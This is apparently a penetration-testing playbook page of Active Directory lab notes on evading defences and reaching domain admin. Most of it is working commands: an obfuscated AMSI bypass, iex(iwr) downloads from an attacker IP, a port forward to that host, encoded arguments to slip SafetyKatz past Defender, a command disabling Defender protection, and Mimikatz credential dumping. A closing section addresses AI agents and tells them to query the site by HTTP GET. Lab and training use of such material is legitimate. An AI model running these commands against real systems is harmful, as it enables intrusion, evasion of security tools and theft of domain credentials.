# Evasion ### Lab 7 Scenario: * Attack Path 1: * Student -> dcorp-ci via Jenkins * dcorp-ci is local admin on -> dcorp-mgmt * Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and use them to access dcorp-dc from Student. * Attack Path 2 (Derivative Local Admin or shortest path to DA): * Student has local admin privilges on dcorp-adminsrv. * To extract credentials, we evaded AppLocker. * dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt. * We extracted domain admin credentials from dcorp-mgmt and used to access dcorp-dc from Student. * Student machine (student372) has exploited Jenkins to get a reverse shell on "dcorp\ciadmin" * From dcorp\ciadmin, we disable SB Logging to run AMSI bypass script. This is done to avoid PowerView detection. * We transfer PowerView to ciadmin to check domain sessions using `Find-DomainUserLocation`and find that there is a domain admin session on dcorp-mgmt server. * We can abuse this using WinRS or PSRemoting. * **Abuse using WinRS** * We first check if we can execute commands on dcorp-mgmt and if WinRM port is open. * Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt. * We want SafetyKatz.exe to run on memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin on ciadmin) to copy Loader to dcorp-mgmt. * We also want to avoid detection on dcorp-mgmt by calling remote IP to download SafeteKatz. So instead of directly calling attacker IP, we port forward localhost to attacker IP. * Since Defender would detect SafetyKatz even with NetLoader, we encode arguments using ArgSplit.bat, copy the output to Safety.bat which runs SafetyKatz.exe through loader with the encoded Arguments. * We download the Safety.bat on ciadmin and xcopy it to dcorp-mgmt. * Finally, we use WinRS to run Safety.bat which uses Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt. * We get credentials of svcadmin - a domain administrator. * **Abuse using PSRemoting** * Check if we can execute commands on dcorp-mgmt using PSRemoting * Download InvokeMimi.ps1 on dcorp-mgmt to dump hashes. * Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt. * After disabling, we run Invoke-command to call the Invoke-Mimi on the session objected we created while disabling AMSI. * We finally get the hashes. * **Using Over-Pass-The-Hash** * We can use O-PTH to use svcadmin's credentials. * From an elevated shell, we can use Rubeus, SafetyKatz, Invoke-Mimi to get a process from hash we obtained earlier as domain controller. * **Derivative Local Admin** * We are trying to find the machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess * We find student372 has local admin access to dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372. * When we try to turn of script logging or bypass AMSI, it does not work because PSRemoting uses Constrained Language Mode (CLM). * We can check this using `$ExecutionContext.SessionState.LanguageMode` * This is either because of AppLocker of WDAC (Windows Defender Application Control). Both of these are application allow listing solutions from Microsoft. We can check AppLocker Policy using: `Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections` cc * We find that everyone can run scripts from Program Files directory. * We can disable Defender and run any script in ProgramFiles. * We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1 which adds "Invoke-Mimi -Command sekurlsa::ekeys" at the end of the Invoke-Mimi.ps1 file. * From student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's ProgramFiles. ## AMSI Bypass First disable Enhanced Script Block Logging so that AMSI is not logged. ``` iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing) ``` Then run the below command to bypass AMSI {% code overflow="wrap" %} ```powershell S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` {% endcode %} ## NetLoader Download and xcopy. {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe ``` {% endcode %} ## Port Forward Localhost:80 to Attacker Machine {% code overflow="wrap" %} ```powershell $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72" ``` {% endcode %} ## Running SafetyKatz.bat ### Use Loader without Encoding {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe $null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit ``` {% endcode %} ### Use Loader after Encoding (Safety.bat) Encode SafetyKatz arguments using **Argsplit.bat** ``` C:\AD\Tools>ArgSplit.bat [!] Argument Limit: 180 characters [+] Enter a string: sekurlsa::ekeys set "z=s" set "y=y" set "x=e" set "w=k" set "v=e" set "u=:" set "t=:" set "s=a" set "r=s" set "q=l" set "p=r" set "o=u" set "n=k" set "m=e" set "l=s" set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%" ``` Include Argsplit output in **Safety.bat** ``` @echo off set "z=s" set "y=y" set "x=e" set "w=k" set "v=e" set "u=:" set "t=:" set "s=a" set "r=s" set "q=l" set "p=r" set "o=u" set "n=k" set "m=e" set "l=s" set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%" echo %Pwn% C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit" ``` ### Download & Execute SafetyKatz.exe in-memory {% code overflow="wrap" %} ```powershell iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat $null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat" ``` {% endcode %} ## PowerShell Remoting Check if we can run cmds on dcorp-mgmt using PSRemoting {% code overflow="wrap" %} ```powershell Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt ``` {% endcode %} Use Invoke-Mimi to dump hashes of domain admin svcadmin: {% code overflow="wrap" %} ```powershell iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing) ``` {% endcode %} ### Disable AMSI using Set-MpPreference ```powershell $sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess ``` Run Invoke-Mimi and get hashes ```powershell Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/evasion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.